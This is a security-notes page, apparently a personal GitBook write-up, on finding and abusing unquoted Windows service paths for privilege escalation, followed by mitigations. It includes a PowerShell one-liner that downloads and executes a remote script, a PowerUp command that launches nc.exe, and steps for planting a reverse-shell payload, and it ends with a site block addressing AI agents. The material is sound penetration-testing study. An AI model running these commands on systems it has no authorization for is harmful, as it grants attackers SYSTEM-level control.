# EoP - Unquoted Service Paths ## Unquoted Service Path Vulnerabilities: Identification and Exploitation ### Key Concepts * **Service Path**: The location of the executable file that a service runs. * **Unquoted Path**: A service path containing spaces but lacking quotation marks (e.g., `C:\Program Files\My Service\service.exe` instead of `"C:\Program Files\My Service\service.exe"`). * **Privilege Escalation**: Gaining elevated access to protected resources. *** ### Identifying Unquoted Service Paths #### **1. Using WMIC** The **Windows Management Instrumentation Command-line (WMIC)** can enumerate services with unquoted paths: ```cmd cmdCopy codewmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\" ``` #### **2. Using PowerShell** A PowerShell script provides a more automated method to identify unquoted paths: ```powershell powershellCopy codeGet-WmiObject -Class Win32_Service | Where-Object { $_.StartName -eq "LocalSystem" } | Select-Object Name, DisplayName, PathName, StartMode | Where-Object { $_.PathName -match " " } ``` #### **3. Using PowerUp** PowerUp, a PowerShell script, identifies privilege escalation vectors, including unquoted paths: ```powershell powershellCopy codepowershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://xyz/PowerUp.ps1'); Invoke-AllChecks" ``` **Example Output:** ```plaintext plaintextCopy code[*] Checking for unquoted service paths... ServiceName : BBSvc Path : C:\Program Files\Microsoft\Bing Bar\7.1\BBSvc.exe StartName : LocalSystem AbuseFunction: Write-ServiceBinary -ServiceName 'BBSvc' -Path ``` *** ### Exploiting Unquoted Service Paths #### **Manual Exploitation Steps** 1. **Identify the Vulnerable Service**:\ Use the methods above to detect vulnerable services. 2. **Create a Malicious Executable**:\ Generate a payload (e.g., a reverse shell) and place it in the same directory as the legitimate executable. 3. **Stop the Service**: ```cmd cmdCopy codesc stop [SERVICE_NAME] ``` 4. **Replace the Executable**:\ Replace the legitimate executable with the malicious payload. 5. **Restart the Service**: ```cmd cmdCopy codesc start [SERVICE_NAME] ``` 6. **Gain Access**:\ When the service restarts, it will execute the malicious payload with elevated privileges. *** #### **Example of Automatic Exploitation with PowerUp** Use PowerUp’s `Invoke-ServiceAbuse` to automate exploitation: ```powershell powershellCopy codeInvoke-ServiceAbuse -Name [SERVICE_NAME] -Command "..\..\Users\Public\nc.exe 1" ``` Replace `[SERVICE_NAME]` with the vulnerable service name and specify the payload command. *** #### **Example of Exploitation Behavior** For a service with the path: ```plaintext plaintextCopy codeC:\Program Files\Something\legit.exe ``` Windows will attempt to execute: 1. `C:\Program.exe` 2. `C:\Program Files.exe` 3. `C:\Program Files\Something\legit.exe` If a malicious `Program.exe` or `Program Files.exe` is placed in these locations, it will execute with elevated privileges. *** ### Exploiting with Metasploit Metasploit provides an exploit module for unquoted service paths: ```bash bashCopy codeuse exploit/windows/local/trusted_service_path ``` This automates the process of finding and exploiting unquoted paths. *** ### Mitigation Strategies #### **1. Quote Service Paths** Always enclose service paths in quotes, particularly if they contain spaces: ```plaintext plaintextCopy code"C:\Program Files\My Service\service.exe" ``` #### **2. Regular Audits** Periodically audit service configurations to detect and remediate unquoted paths. #### **3. Use Least Privilege** Run services with the least privilege required, avoiding `LocalSystem` unless absolutely necessary. #### **4. Implement Security Policies** Adopt strict policies to manage service configurations. #### **5. Monitoring and Alerts** Set up monitoring to detect unauthorized changes to service paths or configurations. *** ### Additional Resources * [**Microsoft Documentation on Windows Services**](https://learn.microsoft.com/en-us/windows/win32/services/overview-of-windows-service-applications) * **OWASP Top 10 Security Risks** --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://karim-ashraf.gitbook.io/karim_ashraf_space/writeups/windows-privilege-escalation/eop-unquoted-service-paths.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.